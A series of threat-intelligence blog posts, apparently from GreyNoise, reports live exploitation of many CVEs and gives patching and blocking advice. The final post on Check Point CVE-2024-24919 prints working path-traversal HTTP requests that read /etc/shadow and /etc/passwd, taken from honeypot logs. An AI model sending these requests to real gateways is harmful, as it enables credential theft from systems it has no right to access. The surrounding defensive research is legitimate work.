‍^{Stone is Head of Content at GreyNoise Intelligence, where he leads strategic content initiatives that illuminate the complexities of internet noise and threat intelligence. In past roles, he led partnered research initiatives with Google and the U.S. Department of Homeland Security. With a background in finance, technology, and engagement with the United Nations on global topics, Stone brings a multidimensional perspective to cybersecurity. He is also affiliated with the Council on Foreign Relations.}

Key Takeaways

• GreyNoise has detected active exploitation of 23 of the 62 CVEs mentioned in Black Basta’s leaked chat logs, including vulnerabilities affecting enterprise software, security appliances, and widely used web applications. 
• CVE-2023-6875 is being exploited despite not being listed in CISA’s Known Exploited Vulnerabilities (KEV) catalog, reinforcing the need for real-time intelligence beyond static lists. 
• Some of these CVEs have been actively exploited in just the past 24 hours, including critical flaws in Palo Alto PAN-OS, JetBrains TeamCity, Microsoft Exchange, and Cisco IOS XE.  
• GreyNoise is not attributing this activity to the ransomware group, Black Basta. Rather, we are observing active exploitation of a subset of the 62 CVEs mentioned in the group’s leaked chat logs. 
• GreyNoise confirms active exploitation of 23 of the 62 CVEs. However, since not all 62 are trackable by GreyNoise, the actual number of exploited vulnerabilities may be higher. 

‍

GreyNoise Confirms Active Exploitation of CVEs Listed in Black Basta’s Leaked Chats

A major leak of internal chat logs from the Black Basta ransomware group has revealed 62 CVEs discussed by the group — offering a glimpse into the vulnerabilities considered for exploitation by one of the most active ransomware operators. The list, first compiled by VulnCheck, underscores how attackers continue to target publicly known vulnerabilities long after disclosure. 

To assess real-world impact, GreyNoise analyzed internet-wide exploitation activity for these vulnerabilities. Our data confirms that 23 of these CVEs are actively being exploited, including in enterprise software, security appliances, and widely used applications. 

‍

Observed Exploitation Activity 

Below we see that 23 of the 62 CVEs mentioned in Black Basta’s leaked chat logs have been targeted within the past 30 days. 

‍

‍

The CVEs are: 

• CVE-2024-3400 – Palo Alto Networks PAN-OS Command Injection 
• CVE-2024-27198 – JetBrains TeamCity Authentication Bypass
• CVE-2024-24919 – Check Point Quantum Security Gateways Information Disclosure
• CVE-2024-23897 – Jenkins Command Line Interface (CLI) Path Traversal Vulnerability
• CVE-2024-1709 – ConnectWise ScreenConnect Authentication Bypass
• CVE-2023-6875 – wpexperts post_smtp_mailer Missing Authorization
• CVE-2023-4966 – Citrix NetScaler ADC and NetScaler Gateway Buffer Overflow Vulnerability
• CVE-2023-42793 – JetBrains TeamCity Authentication Bypass Vulnerability
• CVE-2023-36845 – Juniper Junos OS PHP External Variable Control
• CVE-2023-36844 – Juniper Junos OS EX Series PHP External Variable Modification Vulnerability
• CVE-2023-29357 – Microsoft SharePoint Server Privilege Escalation Vulnerability
• CVE-2023-22515 – Atlassian Confluence Broken Access Control 
• CVE-2023-20198 – Cisco IOS XE Web UI Privilege Escalation 
• CVE-2022-41082 – Microsoft Exchange Server Remote Code Execution 
• CVE-2022-41040 – Microsoft Exchange Server Server-Side Request Forgery Vulnerability
• CVE-2022-37042 – Synacor Zimbra Collaboration Suite (ZCS) Authentication Bypass Vulnerability
• CVE-2022-30525 – Zyxel Multiple Firewalls OS Command Injection 
• CVE-2022-27925 – Synacor Zimbra Collaboration Suite (ZCS) Arbitrary File Upload Vulnerability
• CVE-2022-26134 – Atlassian Confluence Server and Data Center Remote Code Execution Vulnerability
• CVE-2022-22965 – Spring Framework JDK 9+ Remote Code Execution Vulnerability
• CVE-2022-1388 – F5 BIG-IP Missing Authentication Vulnerability
• CVE-2021-44228 – Apache Log4j RCE (Log4Shell)
• CVE-2021-26855 – Microsoft Exchange Server RCE (ProxyLogon)

‍

Recent Exploitation: Activity Seen in the Last 24 Hours

‍A subset of the CVEs targeted within the past 30 days have been targeted within the past 24 hours. These include:

• CVE-2024-3400 – Palo Alto Networks PAN-OS Command Injection 
• CVE-2024-27198 – JetBrains TeamCity Authentication Bypass
• CVE-2024-24919 – Check Point Quantum Security Gateways Information Disclosure
• CVE-2024-1709 – ConnectWise ScreenConnect Authentication Bypass
• CVE-2023-4966 – Citrix NetScaler ADC Buffer Overflow (Citrix Bleed)
• CVE-2023-36845 – Juniper Junos OS PHP External Variable Control
• CVE-2023-22515 – Atlassian Confluence Broken Access Control 
• CVE-2023-20198 – Cisco IOS XE Web UI Privilege Escalation 
• CVE-2022-41082 – Microsoft Exchange Server Remote Code Execution 
• CVE-2022-30525 – Zyxel Multiple Firewalls OS Command Injection 
• CVE-2021-44228 – Apache Log4j RCE (Log4Shell)
• CVE-2021-26855 – Microsoft Exchange Server RCE (ProxyLogon)

‍

How Defenders Can Respond 

‍Organizations should immediately assess their exposure to the actively exploited CVEs from this blog and take the following steps:

• Patch these vulnerabilities — especially those being actively exploited in the last 24 hours. 
• Use GreyNoise’s intelligence to prioritize and validate real-world threats.
• Move beyond KEV — CVE-2023-6875 underscores the importance of real-time intelligence over advisories and lists. 

‍

How to Investigate These CVEs in GreyNoise

• GreyNoise customers: Log in to the GreyNoise product, navigate to the CVEs tab, paste the 62 CVEs, and select “SEARCH” to see real-time exploitation activity. 
• Free users: GreyNoise allows you to search for exploitation activity one CVE at a time via our free lookup tool. 

‍

Full List of CVEs Mentioned in Black Basta’s Leaked Chat Logs

The following 62 CVEs were identified in Black Basta’s leaked chat logs by VulnCheck. Organizations can use this list to assess their exposure. 

• CVE-2024-3400
• CVE-2024-27198
• CVE-2024-26169
• CVE-2024-25600
• CVE-2024-24919
• CVE-2024-23897
• CVE-2024-23113
• CVE-2024-23109
• CVE-2024-23108
• CVE-2024-21762
• CVE-2024-21683
• CVE-2024-21413
• CVE-2024-21378
• CVE-2024-21338
• CVE-2024-1709
• CVE-2024-1708
• CVE-2024-1086
• CVE-2023-7028
• CVE-2023-7027
• CVE-2023-6875
• CVE-2023-4966
• CVE-2023-42793
• CVE-2023-42115
• CVE-2023-38831
• CVE-2023-36884
• CVE-2023-36874
• CVE-2023-36845
• CVE-2023-36844
• CVE-2023-36745
• CVE-2023-36394
• CVE-2023-35628
• CVE-2023-3519
• CVE-2023-3467
• CVE-2023-3466
• CVE-2023-29357
• CVE-2023-23397
• CVE-2023-22515
• CVE-2023-21716
• CVE-2023-20198
• CVE-2022-41352
• CVE-2022-41082
• CVE-2022-41040
• CVE-2022-37969
• CVE-2022-37042
• CVE-2022-30525
• CVE-2022-30190
• CVE-2022-27925
• CVE-2022-26134
• CVE-2022-22965
• CVE-2022-1388
• CVE-2022-0609
• CVE-2021-44228
• CVE-2021-42321
• CVE-2021-42287
• CVE-2021-42278
• CVE-2021-40444
• CVE-2021-28482
• CVE-2021-26855
• CVE-2020-1472
• CVE-2017-5754
• CVE-2017-5753
• CVE-2017-11882

‍

GreyNoise will continue monitoring exploitation trends in real time. Stay updated by following GreyNoise’s threat intelligence reports, platform updates, and by visiting the GreyNoise visualizer. 

‍

GreyNoise is developing an enhanced dynamic IP blocklist to help defenders take faster action on emerging threats. Click here to learn more or get on the waitlist.

‍

— — — 

‍^{Stone is Head of Content at GreyNoise Intelligence, where he leads strategic content initiatives that illuminate the complexities of internet noise and threat intelligence. In past roles, he led partnered research initiatives with Google and the U.S. Department of Homeland Security. With a background in finance, technology, and engagement with the United Nations on global topics, Stone brings a multidimensional perspective to cybersecurity. He is also affiliated with the Council on Foreign Relations.}

‍

Key Takeaways

• GreyNoise has observed active exploitation of CVE-2023-20198, with 110 malicious IPs actively targeting vulnerable Cisco devices, primarily from Bulgaria, Brazil, and Singapore. 

‍

‍

• Two malicious IPs exploited CVE-2018-0171 in December 2024 and January 2025, originating from Switzerland and the United States — the same period when Salt Typhoon, a Chinese state-sponsored threat group, reportedly breached telecom networks using CVE-2023-20198 and CVE-2023-20273. 
• CVE-2018-0171 was disclosed seven years ago, yet remains in use by advanced attackers. 
• Unpatched Cisco systems are being actively targeted. Organizations should take immediate action. 

‍

Background

Recent analyses have highlighted that Salt Typhoon, a Chinese state-sponsored cyber espionage group, has been actively targeting Cisco devices. The group employs various tactics, including the use of legitimate login credentials and, in some instances, exploiting known vulnerabilities such as CVE-2018-0171.

Between December 2024 and January 2025, Salt Typhoon reportedly leveraged CVE-2023-20198 and CVE-2023-20273 to compromise five additional telecom networks, including entities in the United States. 

‍

GreyNoise Observations

GreyNoise’s global observation grid (GOG) has detected malicious exploitation attempts against two Cisco vulnerabilities linked to these attacks: 

‍

CVE-2018-0171 (IOS and IOS XE Smart Install Remote Code Execution) 

• Observed: Two malicious IPs exploited this vulnerability in December 2024 and January 2025.
• These IPs were traced to Switzerland and the United States.
• Cisco Talos reported Salt Typhoon likely used this CVE in real-world attacks. 

‍

CVE-2023-20198 (IOS XE Web UI Privilege Escalation)

• Observed: GreyNoise has confirmed 110 malicious IPs actively exploiting CVE-2023-20198 in real time, reinforcing the scale of ongoing attacks. 
• These IPs were primarily traced to Bulgaria, Brazil, and Singapore. 

‍

‍

Mitigation Recommendations

1. Apply all patches immediately. 
2. Restrict management interface access. 
3. Use GreyNoise to track real-time exploitation and block malicious IPs. 

GreyNoise will continue monitoring for changes in exploitation patterns and provide updates as new intelligence emerges. Stay ahead of exploitation attempts by leveraging GreyNoise’s real-time intelligence. 

‍

‍

Important: These CVEs were referenced in recent Salt Typhoon reports, but we are NOT attributing this activity to Salt Typhoon — only confirming that exploitation is occurring.

‍

GreyNoise is developing an enhanced dynamic IP blocklist to help defenders take faster action on emerging threats. Click here to learn more or get on the waitlist.

‍

---

‍

^{Stone is Head of Content at GreyNoise Intelligence, where he leads strategic content initiatives that illuminate the complexities of internet noise and threat intelligence. In past roles, he led partnered research initiatives with Google and the U.S. Department of Homeland Security. With a background in finance, technology, and engagement with the United Nations on global topics, Stone brings a multidimensional perspective to cybersecurity. He is also affiliated with the Council on Foreign Relations.}

Update: February 18, 2025

• GreyNoise now sees 25 malicious IPs actively exploiting CVE-2025-0108, up from 2 on February 13. 
• Top 3 source countries of attack traffic: United States, Germany, Netherlands. 
• Palo Alto Networks confirmed active exploitation and classified the CVE as ‘Highest Urgency’ for defenders. 

CISA added CVE-2025-0108 to its Known Exploited Vulnerabilities (KEV) catalog.

‍

GreyNoise has observed active exploitation attempts targeting a newly disclosed authentication bypass vulnerability, CVE-2025-0108, affecting Palo Alto Networks PAN-OS. This high-severity flaw allows unauthenticated attackers to execute specific PHP scripts, potentially leading to unauthorized access to vulnerable systems.

Active Exploitation Detected in the Wild

GreyNoise can confirm active exploitation of CVE-2025-0108.

Organizations relying on PAN-OS firewalls should assume that unpatched devices are being targeted and take immediate steps to secure them. 

‍

‍

‍

‍

Mitigation Steps: Act Now

Defenders should take the following steps immediately: 

• Apply security patches for PAN-OS as soon as possible. 
• Restrict access to firewall management interfaces — ensure they are not publicly exposed. 
• Monitor active exploitation trends with GreyNoise’s CVE-2025-0108 tag.

GreyNoise will continue tracking this threat as it evolves. Stay ahead of exploitation attempts by leveraging GreyNoise’s real-time intelligence. 

‍

‍

GreyNoise is developing an enhanced dynamic IP blocklist to help defenders take faster action on emerging threats. Click here to learn more or get on the waitlist.

‍

---

‍

^{Stone is Head of Content at GreyNoise Intelligence, where he leads strategic content initiatives that illuminate the complexities of internet noise and threat intelligence. In past roles, he led partnered research initiatives with Google and the U.S. Department of Homeland Security. With a background in finance, technology, and engagement with the United Nations on global topics, Stone brings a multidimensional perspective to cybersecurity. He is also affiliated with the Council on Foreign Relations.}

‍

GreyNoise has identified a significant spike in exploitation activity targeting two vulnerabilities — one already flagged by government agencies as a top target, and another flying under the radar despite real-world attacks increasing. 

• CVE-2022-47945 (ThinkPHP LFI) – A local file inclusion vulnerability in ThinkPHP that is not in CISA’s Known Exploited Vulnerabilities (KEV) catalog and has a low EPSS score (7%), yet GreyNoise has observed a surge in exploitation attempts. 
• CVE-2023-49103 (ownCloud GraphAPI Information Disclosure) – A vulnerability already highlighted in a joint advisory from CISA, NSA, and FBI as one of the most exploited in 2023, and exploitation continues to rise. 

Both vulnerabilities highlight a growing concern in how organizations prioritize patching:

• Are security teams overlooking major threats because they don’t appear in KEV or have low EPSS scores?
• How many other actively exploited vulnerabilities are slipping through the cracks?

‍

What We’re Seeing: Surging Exploitation Activity 

GreyNoise has observed a rapid increase in exploit attempts for both vulnerabilities over the past 10 days.

Observed Exploitation Attempts for CVE-2022-47945 (ThinkPHP LFI)

‍

‍

Observed Exploitation Attempts for CVE-2023-49103 (ownCloud GraphAPI)

‍

‍

Attackers are actively scanning and targeting these vulnerabilities yet only one is included in KEV, raising questions about how security teams are prioritizing threats. 

‍

CVE-2022-47945 (ThinkPHP LFI) - A Growing Target

• ThinkPHP before version 6.0.14 is vulnerable to local file inclusion (LFI) via the `lang` parameter when language packs are enabled.
• GreyNoise has observed 572 unique IPs attempting to exploit this vulnerability, with activity increasing in recent days. 
• ThinkPHP vulnerabilities have been targeted by Chinese attackers in past campaigns. 

‍

‍

CVE-2023-49103 (ownCloud GraphAPI) - Still Under Attack

• An information disclosure vulnerability affecting ownCloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1.
• Added to CISA KEV in November 2023, reinforcing its status as a known exploited vulnerability. 
• GreyNoise has observed 484 unique IPs attempting exploitation, with confirmed threat actor activity.

‍

‍

Key Takeaways for Security Teams

• EPSS and KEV don’t always align with real-world risk. CVE-2022-47945 has a low EPSS score (7%) yet is actively being exploited. 
• CVE-2023-49103 remains a high-value target after being listed on KEV over a year ago. 
• Real-time attack data is critical. Organizations overrelying on KEV and EPSS risk overlooking threats that attackers are actively scanning and exploiting. What’s being targeted and when can change in an instant, necessitating a real-time view of attacker activity. 

‍

Mitigation Recommendations

• Patch immediately — Upgrade ThinkPHP to 6.0.14+ and ownCloud GraphAPI to 0.3.1+.
• Monitor and block known malicious IPs — Use real-time GreyNoise data to track and mitigate active threats. 
• Restrict exposure — Reduce access to affected services where possible to limit attack surface. 

Block Known Malicious IPs Now: CVE-2023-49103, CVE-2022-47945

‍

A Larger Trend: Are We Prioritizing the Wrong Vulnerabilities? 

The difference in how these two CVEs are being treated highlights a broader challenge in vulnerability management. 

• How many actively exploited vulnerabilities are being overlooked due to low EPSS scores?
• Are organizations placing too much trust in KEV alone, and EPSS, when prioritizing patching? 
• What role should real-time exploitation intelligence play in risk management? 

Attackers are making their priorities clear. See live exploitation trends now for  CVE-2023-49103 and CVE-2022-47945.

‍

GreyNoise is developing an enhanced dynamic IP blocklist to help defenders take faster action on emerging threats. Click here to learn more or get on the waitlist.

‍

2025-01-29 Update
After identifying a significant overlap between IPs exploiting CVE-2024-40891 and those classified as Mirai, the team investigated a recent variant of Mirai and confirmed that the ability to exploit CVE-2024-40891 has been incorporated into some Mirai strains.

‍

GreyNoise is observing active exploitation attempts targeting a zero-day critical command injection vulnerability in Zyxel CPE Series devices tracked as CVE-2024-40891. At this time, the vulnerability is not patched, nor has it been publicly disclosed. Attackers can leverage this vulnerability to execute arbitrary commands on affected devices, leading to complete system compromise, data exfiltration, or network infiltration. At publication, Censys is reporting over 1,500 vulnerable devices online.

CVE-2024-40891 is very similar to CVE-2024-40890 (observed authentication attempts, observed command injection attempts), with the main difference being that the former is telnet-based while the latter is HTTP-based. Both vulnerabilities allow unauthenticated attackers to execute arbitrary commands using service accounts (supervisor and/or zyuser).

‍

Background

VulnCheck disclosed CVE-2024-40891 to their partners as "Zyxel CPE Telnet Command Injection" on August 1, 2024, but as of this writing, the CVE has not yet been officially published by the vendor, nor have they published an advisory. Last week, researchers from GreyNoise collaborated with VulnCheck to verify the accuracy of the detection, ensuring that the traffic is linked to this CVE specifically. GreyNoise researchers created a tag for this issue on January 21, 2025, and worked with VulnCheck to coordinate this disclosure. Ordinarily, disclosure would be coordinated with the vendor, but due to the large number of attacks, we decided to publish this immediately.

‍

Immediate Recommendations

1. Network Monitoring: Filter traffic for unusual telnet requests to Zyxel CPE management interfaces.
2. Patch Readiness: Monitor Zyxel’s security advisories for updates and apply patches or mitigations immediately, if released. Halt the use of devices that have reached end-of-life.
3. Mitigation: Restrict administrative interface access to trusted IPs and disable unused remote management features.

GreyNoise users can track live exploitation patterns, including attacker IP addresses, for this CVE here.

‍

GreyNoise is developing an enhanced dynamic IP blocklist to help defenders take faster action on emerging threats. Click here to learn more or get on the waitlist.

‍

Over 15,000 Fortinet FortiGate firewalls have been exposed in a breach, leaving thousands with exposed login interfaces vulnerable to exploitation. GreyNoise has identified hundreds of these devices actively being weaponized by attackers for malicious purposes, providing defenders with a real-time view into their behavior and intent. 

This breach, tied to CVE-2022-40684 — an authentication bypass vulnerability disclosed in late 2022 — has created new opportunities for attackers to exploit these devices. While patches have been available since October 2022, thousands of firewalls remain exposed as of January 2025, continuing to pose a serious risk. 

But this breach isn’t just about exposure — it's about the active exploitation happening right now. In this blog, GreyNoise reveals how attackers are leveraging these devices in real time and provides critical insights to help defenders respond effectively.

‍

GreyNoise’s Real-Time Insights: What We’re Seeing 

GreyNoise specializes in observing and classifying internet activity in real time. Our global observation grid tracks attacker behaviors by monitoring interactions with thousands of our sensors worldwide. Unlike sources that focus on theoretical risks or exposure, GreyNoise reveals the actual behaviors of these compromised devices as they interact with our sensors. 

Of the 15,000+ affected IPs, according to Censys around 4,600 are still exposing their FortiGate web login interfaces, down from over 5,000 at the time of a Censys blog detailing the figures. The below chart illustrates the steady decline.  

‍

‍

Key Observations from GreyNoise: 

1. In this Case, Interaction with GreyNoise’s Sensors = Harmful Intent

Firewalls hitting GreyNoise’s sensors are behaving abnormally. 

• “The majority of affected IPs are classified as Unknown simply because we don’t yet have tags for their activity,” explains Bob Rudis, VP of Data Science, Security Research & Detection Engineering. “But make no mistake: by hitting our sensor network, all 366 IPs are up to no good.” 
• All 366 IPs are engaging in behaviors indicative of threat activity. While some are confirmed as malicious, others are flagged as Suspicious or Unknown but still require attention. 

‍

2. Behavioral Breakdown and List of Compromised IPs 

GreyNoise classifies observed activity into three categories. Here’s the breakdown for the 366 Fortinet IPs:  

• Malicious (35 IPs): Actively scanning, probing, or delivering malicious payloads. 
• Suspicious (45 IPs): Abnormal or pre-malicious behavior flagged under GreyNoise’s new “Suspicious” classification, designed to provide early warnings. 
• Unknown (286 IPs): Activity that doesn’t match known tags but is inherently suspect, as Fortinet firewalls shouldn’t scan or probe networks. This suggests the devices are being leveraged for malicious purposes.

‍

This activity is not new. GreyNoise has observed compromised Fortinet devices exhibiting harmful behaviors over several years, as shown below. The timeline highlights both the first and most recent sightings of these devices interacting with our sensor network.

‍

‍

To help defenders — particularly firewall administrators — take immediate action, we’re sharing a list of the 366 Fortinet IPs interacting with our sensor network, updated as of January 28: 

Download the full list of observed IPs here. This information may change; to view a dynamic list of all IPs interacting with our network, navigate to the GreyNoise Analysis Tab:

‍

‍

Paste the 15,000+ affected IPs:

‍

‍

Click “ANALYZE,” and explore the results:

‍

‍

3. Threat Trends: What Attackers are Doing

Tags assigned to these devices reveal active reconnaissance or exploitation activity originating from compromised Fortinet systems: 

• SMBv1 Crawlers (82 instances): Scanning for outdated SMB protocols, often linked to WannaCry-like attacks. 
• SSH Connection Attempts (24 instances): Brute-force or reconnaissance targeting S
• WebCrawler (23 Instances): Reconnaissance aimed at mapping networks or identifying exposed assets. 

‍

4. Geographic Distribution 

These compromised devices originate from multiple regions worldwide. The top 10 hotspots are: 

1. Brazil (45%)
2. Thailand (15%)
3. Mexico (8%)
4. Egypt (4%)
5. Malaysia (3%)
6. United Arab Emirates (2%)
7. Colombia (2%)
8. India (2%)
9. Kenya (2%)
10. Israel (1%)

‍

‍

This global spread underscores how widely Fortinet firewalls are deployed and how attackers are leveraging them for malicious purposes. 

‍

Actionable Steps for Defenders

‍

SOC Analysts & Threat Hunters

1. Audit Your IPs and CIDRs

• Cross-check your external-facing IPs against the list of 366 observed IPs to identify any suspicious or malicious activity originating from your infrastructure. Or, obtain a real-time view of compromised IPs by navigating to the GreyNoise Analysis Tab and pasting the 15,000+ affected IPs.
• If you are a firewall administrator using Fortinet devices, ensure your configurations are reviewed immediately to confirm no unnecessary interfaces are exposed.

‍

2. Monitor Your Infrastructure for Compromise

• Use GreyNoise to track malicious behaviors originating from compromised devices and ensure you receive alerts for suspicious activity tied to your infrastructure. 

‍

Firewall Admins & Vulnerability Managers

1. Patch and Secure Your Devices

• Ensure all Fortinet devices are updated to address CVE-2022-40684 and other known vulnerabilities. Review configurations to close any unnecessary access points.

‍

2. Block Compromised Fortinet IPs

• Use GreyNoise to swiftly and instantly block Fortinet IPs hitting our sensor network.

‍

Take Action Now 

With GreyNoise, organizations can monitor their external-facing IPs, reduce noise in their threat landscape, and focus their defenses on the most immediate and significant risks. In the case of Fortinet firewalls, if it’s hitting GreyNoise sensors, it’s already up to no good. 

Take control of your external threat landscape today. Use GreyNoise to monitor malicious activity, track behaviors in real time, and protect your organization. Add your IPs or CIDRs to GreyNoise’s alerts now. 

‍

GreyNoise is developing an enhanced dynamic IP blocklist to help defenders take faster action on emerging threats. Click here to learn more or get on the waitlist.

‍

Request a demo today >>

‍

Attackers are increasingly capitalizing on newly disclosed vulnerabilities within hours of proof-of-concept (PoC) code becoming public. This shrinking timeline leaves defenders with little time to react. A recent example is the rapid response to two Mitel MiCollab vulnerabilities — CVE-2024-41713 (authentication bypass) and CVE-2024-35286 (SQL injection). On December 5, GreyNoise was ready. The same day the PoC went public, GreyNoise began observing attacker activity, demonstrating the speed at which threat actors exploit new information. 

‍

Timeline: From Disclosure to Observed Activity 

• May 2024: CVE-2024-35286, the SQL injection vulnerability, is patched by Mitel. 
• October 2024: CVE-2024-41713, an authentication bypass vulnerability, is disclosed. No PoC or large-scale visible activity is observed at this time. 
• December 5, 2024: PoC code is publicly released for CVE-2024-41713, chaining it with another vulnerability. GreyNoise immediately deploys detection tags for both CVEs and begins observing attacker activity, including reconnaissance or exploitation, within hours. 

‍

Seeing the Activity: Data from GreyNoise

The following screenshots from GreyNoise’s Visualizer show unique IP addresses associated with attacker activity following the PoC release. These spikes coincide with the deployment of detection tags, providing a clear picture of how quickly attackers respond to new exploit information. 

‍

Leveraging our IP blocklists, GreyNoise customers can immediately block IPs targeting these vulnerabilities. 

‍

CVE-2024-41713 (Authentication Bypass):

The chart below shows unique IP addresses probing for CVE-2024-41713 on December 5, immediately after the PoC release. This activity demonstrates attacker interest, highlighting how quickly attackers act on new exploit opportunities. For defenders, this means prioritizing visibility and mitigation immediately after public disclosures.  

‍

CVE-2024-35286 (SQL Injection): 

While the SQL injection vulnerability showed limited activity, it’s important to monitor for potential escalation. Even low activity levels can indicate attackers testing the waters, making proactive mitigation essential. 

‍

‍

Addressing the Threat: Patches Are Available 

Both vulnerabilities have been addressed by Mitel: 

• CVE-2024-35286: Mitel released a patch in May 2024. Organizations should apply this fix immediately to mitigate risk. 
• CVE-2024-41713: Mitel resolved this issue in MiCollab version 9.6, released in October 2024. Upgrading to this version or later is essential. 

By applying these patches, organizations can reduce their exposure to attacker activity. 

‍

The Value of Real-Time Intelligence 

The divergence between predicted exploit likelihood and real-world attacker behavior highlights the necessity for real-time threat intelligence. Predictive models like EPSS currently list both CVEs at 0% likelihood of exploitation, yet GreyNoise’s data provides concrete evidence of attacker activity. This underscores a critical reality: attackers act on opportunities as soon as they arise, often outpacing static predictions. 

‍

With GreyNoise, defenders can: 

• Gain Immediate Visibility: Real-time data shows attacker activity targeting vulnerabilities as it happens.
• Prioritize Effectively: Knowing where attackers are focusing their efforts helps defenders allocate resources wisely. 
• Preempt Escalation: Use GreyNoise blocklists and intelligence feeds to disrupt attacker workflows before reconnaissance escalates into exploitation. 

‍

Recommendations for Defenders

Organizations leveraging Mitel MiCollab should act quickly: 

1. Apply Available Patches: Ensure that fixes for both CVEs are implemented without delay. 
2. Leverage Real-Time Monitoring: Use platforms like GreyNoise to stay informed about attacker activity targeting your infrastructure.
3. Adopt Layered Defenses: Implement network segmentation, access controls, and continuous monitoring to reduce exposure and contain potential breaches. 
4. Proactively Block Malicious IPs: Leverage real-time intelligence to identify threat actor IPs and dynamically block them.

‍

Staying Ahead of the Curve

The Mitel MiCollab vulnerabilities demonstrate the importance of rapid response in cybersecurity. While defenders cannot always predict when attackers will act, real-time visibility ensures they can respond effectively to reconnaissance or exploitation efforts as they emerge. GreyNoise’s ability to deploy detection tags on the same day as the PoC release exemplifies its commitment to staying ahead of attackers. This readiness is crucial in a world where the window between disclosure and active attacker activity continues to shrink. By detecting reconnaissance or exploitation efforts within hours, GreyNoise gives defenders the critical lead time needed to respond effectively. 

The insights in this blog were made possible by GreyNoise’s Global Observation Grid, a network of internet-facing, primary sensors that passively observe and analyze global attack traffic. GreyNoise recently announced significant enhancements to its sensor and data pipeline technology that deliver deeper insights and broader coverage into cyber threats, equipping security teams with actionable intelligence to better detect, prioritize, and respond to emerging and resurgent threats.

‍

‍Stay ahead of emerging threats with GreyNoise’s real-time intelligence. Contact us today to learn how we can help protect your organization from evolving vulnerabilities.

Discover the latest findings from GreyNoise Labs as we delve into a perma-vuln plaguing the D-Link DIR-859 router. In our newest blog post, "Perma-Vuln: D-Link DIR-859, CVE-2024-0769," we uncover the intricacies of CVE-2024-0769, a path traversal vulnerability affecting D-Link DIR-859 WiFi routers, leading to information disclosure.

‍

‍

The exploit's variations, including one observed in the wild by GreyNoise, enable the extraction of account details from the device. The product is End-of-Life, so it won't be patched, posing long-term exploitation risks. Multiple XML files can be invoked using the vulnerability.

Click here to see the details and interesting payload that Sift has identified.

‍

‍

On June 5, 2024, SolarWinds published an advisory detailing CVE-2024-28995 - a path-traversal vulnerability in Serv-U, discovered by Hussein Daher. Our Labs team - with our brand new deception engineer - seized this opportunity to deploy a new honeypot they've been working on. It's supposed to look more real - and vulnerable! - than past honeypots.

What did they discover?

They show off all kinds of information gleaned from their honeypot - who's attacking it, what files they're trying to steal, how often they come back, and more.

But, that's not all!

They actually managed to capture a live attacker making several copy/paste mistakes, and attempting to correct the exploit only to foul it up again! They track the attacker's progress over the course of 4 hours, including one instance where they sent the completely wrong exploit (which happens to be for an unpatched vulnerability!).

Check out the full blog on GreyNoise Labs to learn more about this vulnerability and our observations.

‍

‍

Check out the latest from GreyNoise Labs as we examine the technical details of CVE-2024-4577, a serious remote code execution vulnerability in PHP affecting Windows deployments. Discovered by DEVCORE and demonstrated by watchTowr, this vulnerability exploits a 'best-fit' Unicode processing behavior in Windows. This allows attackers to inject command-line arguments via HTTP requests.

‍

‍

Detailed examples of payloads observed in the wild to achieve remote code execution are included, showcasing how attackers exploit the vulnerability in the real world. These payloads range from simple PHP code snippets to more complex scripts that download and execute malicious binaries.

Check out the detailed post here for a deeper dive into the technical details and the full range of payloads.

‍

On May 28, 2024, Check Point published an advisory (and emailed customers) regarding CVE-2024-24919, a CVSS 8.6 vulnerability that they described using fairly vague language: "exploiting this vulnerability can result in accessing sensitive information on the Security Gateway. This, in certain scenarios, can potentially lead the attacker to move laterally and gain domain admin privileges."

Although they buried the lede a bit, if you scroll way down and click through a bit, you'll see that attacks in the wild occurred as far back as April 7, 2024 (nearly 2 months)! Two days after the advisory came out (May 30, 2024), we published a tag, which currently shows rapidly increasing exploitation:

‍

‍

Although you can’t see it on the graph, the very first attempts we saw were on May 31, 2024 at around 9:30am UTC. We also observed some attempted exploits on May 30, 2024, but they don’t show up in our public data because they don’t actually work (more on that below).

On the same day (May 30, 2024), watchTowr labs published an amazing write-up that includes a working proof of concept. On that same day, CISA added it to the Known Exploited Vulnerabilities list.

On May 31, 2024, our friends at Censys published their write-up, which indicated that there are nearly 14,000 devices running some version of that software, although it’s not clear how many of those have exposed management ports.

The vulnerability

The core vulnerability is a pretty straight-forward path traversal issue. One of the folks on my team reverse engineered the patch concurrently with watchTowr and came up with basically the same exploit (this one is from watchTowr):

POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

Since the server runs as root, an attacker can grab any file on the filesystem! We’ll show you what attackers are actually searching for below.

Our observations

Sift

Although we tagged this issue very quickly, we actually saw the first exploit attempt (attempt), with a non-working exploit, hitting Sift on May 30, 2024 - presumably somebody thought they’d figured it out and pushed the big “go” button a bit too quickly:

POST /clients/MyCRL HTTP/1.1
Host: <ip>
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 38
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64)

/clients/MyCRL/../../../..//etc/shadow

We started seeing actual exploitation attempts logged in Sift on May 31, 2024:

POST /clients/MyCRL HTTP/1.1
Host: <ip>
Connection: close
Accept-Encoding: gzip
Connection: close
Content-Length: 39
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

aCSHELL/../../../../../../../etc/shadow

I’m always impressed when an automated system can catch a novel exploit without being told about it!

Honeypot data

We manually searched our honeypot data going back 90 days prior to today (June 4, 2024), and the oldest exploit attempts that we see started on May 30, 2024, at about 5pm UTC:

POST /clients/MyCRL HTTP/1.1
Host: <IP_ADDRESS>
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/<IP_ADDRESS> Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 38

/clients/MyCRL/../../../..//etc/passwd

The word “attempts” is doing a lot of work in that sentence because, from what we can tell, this payload doesn’t actually work - perhaps somebody pressed the big red button before actually testing their exploit?

In any case, the IP address using that broken payload was 125.229.221.55, a Taiwan-based address that started scanning for HNAP-enabled devices on May 30, 2024, then a few hours later (on the same day) started scanning for CVE-2024-24919. We can’t say with certainty whether the HNAP scan is related, but it’s the only other traffic we’ve ever seen from that IP address. In the exploits, the IP attempted to fetch /etc/passwd and /etc/shadow.

The first real exploitation we observed began on the morning of May 31, around 9:40am UTC, when a New York-based IP address, 45.88.91.78, took a break from searching for CISCO ASA appliances and started launching exploits for this issue with a payload that would appear to actually work (and, in fact, is suspiciously identical to watchTowr’s PoC, including the number of ../s):

POST /clients/MyCRL HTTP/1.1
Host: <IP_ADDRESS>
